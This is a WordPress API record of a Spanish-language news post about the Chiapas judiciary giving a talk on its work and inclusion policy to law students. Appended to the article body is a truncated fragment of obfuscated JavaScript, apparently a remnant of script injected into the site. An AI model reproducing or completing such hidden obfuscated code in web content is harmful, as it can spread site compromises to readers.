{"id":7200,"date":"2022-12-07T04:04:20","date_gmt":"2022-12-07T04:04:20","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=7200"},"modified":"2022-12-07T04:04:22","modified_gmt":"2022-12-07T04:04:22","slug":"visita-poder-judicial-a-futuras-abogadas-y-abogados-de-una-institucion-educativa","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=7200","title":{"rendered":"Visita Poder Judicial a futuras abogadas y abogados de una instituci\u00f3n educativa"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"570\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/WhatsApp-Image-2022-12-06-at-6.02.38-PM-1024x570.jpeg\" alt=\"\" class=\"wp-image-7201\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/WhatsApp-Image-2022-12-06-at-6.02.38-PM-1024x570.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/WhatsApp-Image-2022-12-06-at-6.02.38-PM-300x167.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/WhatsApp-Image-2022-12-06-at-6.02.38-PM-768x428.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/WhatsApp-Image-2022-12-06-at-6.02.38-PM.jpeg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>-Imparte pl\u00e1tica Poder Judicial a estudiantes de la licenciatura en Derecho, da conocer su funcionamiento y su pol\u00edtica incluyente.<\/p>\n\n\n\n<p>06 diciembre 2022<\/p>\n\n\n\n<p>Tuxtla Guti\u00e9rrez; Chiapas.- El Poder Judicial del Estado, que encabeza el magistrado presidente del Tribunal Superior de Justicia y del Consejo de la Judicatura, Guillermo Ramos P\u00e9rez, realiza actividades a fin de informar las actividades que realiza esta casa de la justicia a diferentes sectores de la sociedad chiapaneca.<\/p>\n\n\n\n<p>Una de ellas, es las pl\u00e1ticas informativas en las diferentes universidades estatales, como es el caso de la realizada en la Universidad Valle del Grijalva (UVG), donde integrantes del Instituto de Formaci\u00f3n, Profesionalizaci\u00f3n y Carrera Judicial y del Centro Estatal de Justicia Alternativa (CEJA), realizaron a las y los alumnos del 5\u00ba, 6\u00ba, 7\u00ba y 8\u00ba cuatrimestre.<\/p>\n\n\n\n<p>El objetivo de esta actividad, fue dar a conocer en primera instancia, el funcionamiento, la estructura y las facultades de este Poder Judicial, as\u00ed como su pol\u00edtica incluyente y de no discriminaci\u00f3n; en segundo t\u00e9rmino, explicar a detalle la funci\u00f3n del Instituto de Formaci\u00f3n, Profesionalizaci\u00f3n y Carrera Judicial, las cuales fueron explicadas por el coordinador de Biblioteca, Juan Antonio Guti\u00e9rrez Ch\u00e1vez y Jos\u00e9 Luis Baltazar Arg\u00fcello.<\/p>\n\n\n\n<p>Asimismo, el especialista P\u00fablico Conciliador, adscrito al Centro Estatal de Justicia Alternativa, Hermann Ruschke G\u00f3mez, detall\u00f3 a las y los universitarios sobre los Mecanismos Alternativos de Soluci\u00f3n de Conflictos, y por supuesto, el quehacer del CEJA.<\/p>\n\n\n\n<p>Antes de finalizar, el compa\u00f1ero del Instituto de Formaci\u00f3n, Profesionalizaci\u00f3n y Carrera Judicial, Miguel Bonifaz Culebro, comparti\u00f3 su experiencia como trabajador en esta casa de la justicia, que, siendo un profesionista con discapacidad, ha sido integrado satisfactoriamente a esta instituci\u00f3n.<\/p>\n\n\n\n<p>Y es que, en esta casa de justicia, existe las condiciones y pol\u00edticas incluyentes, para que profesionistas como Miguel Bonifaz, que ocupa una silla de ruedas para su movilidad, puedan acceder y desarrollarse satisfactoriamente dentro de esta instrucci\u00f3n.Finalmente, directivos de la universidad entregaron reconocimientos a los ponentes, y agradecieron este acercamiento que resulta beneficioso en la formaci\u00f3n de los futuros especialistas en Derecho.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>-Imparte pl\u00e1tica Poder Judicial a estudiantes de la licenciatura en Derecho, da conocer su funcionamiento y su pol\u00edtica incluyente. 06 diciembre 2022 Tuxtla Guti\u00e9rrez; Chiapas.- El Poder Judicial del Estado, que encabeza el magistrado presidente del Tribunal Superior de Justicia y del Consejo de la Judicatura, Guillermo Ramos P\u00e9rez, realiza actividades a fin de informar &hellip;<\/p>\n","protected":false},"author":2,"featured_media":7201,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[20,17,6],"tags":[],"class_list":["post-7200","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-minuto","category-portada","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7200","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7200"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7200\/revisions"}],"predecessor-version":[{"id":7202,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7200\/revisions\/7202"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/7201"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7200"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7200"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7200"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}